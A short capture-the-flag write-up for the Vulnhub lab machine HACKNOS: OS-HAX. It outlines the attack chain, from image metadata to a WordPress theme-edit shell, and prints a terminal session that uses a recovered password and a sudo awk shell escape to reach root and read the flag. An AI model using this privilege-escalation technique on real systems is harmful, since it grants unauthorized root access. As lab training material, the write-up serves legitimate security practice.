Vulnhub: HACKNOS: OS-HAX

HACKNOS: OS-HAX

Difficulty: Intermediate

This is HACKNOS: OS-HAX from Vulnhub.

Image from website > exiftool > hidden directory > brainfuck password > wordpress login > edit 404.php > shell > privesc

www-data@jax:/dev/shm$ su web
su web
Password: Hacker@4514

$ sudo -u root /usr/bin/awk 'BEGIN {system("/bin/sh")}'
sudo -u root /usr/bin/awk 'BEGIN {system("/bin/sh")}'
# cd /root
cd /root
# ls -lash
ls -lash
total 28K
4.0K drwx------  2 root root 4.0K Nov  1  2019 .
4.0K drwxr-xr-x 22 root root 4.0K Nov  1  2019 ..
4.0K -rw-------  1 root root  607 Nov  1  2019 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Nov  1  2019 .bashrc
4.0K -rw-r--r--  1 root root  651 Nov  1  2019 final.txt
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-------  1 root root 1.1K Nov  1  2019 .viminfo
# cat final.txt;id;hostname
cat final.txt;id;hostname
MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b

Rahul_Gehlaut  =>> https://www.linkedin.com/in/rahulgehlaut/

Web_Site ==>> http://jameshacker.me
uid=0(root) gid=0(root) groups=0(root)
jax

Can’t see myself doing another one of these any time soon.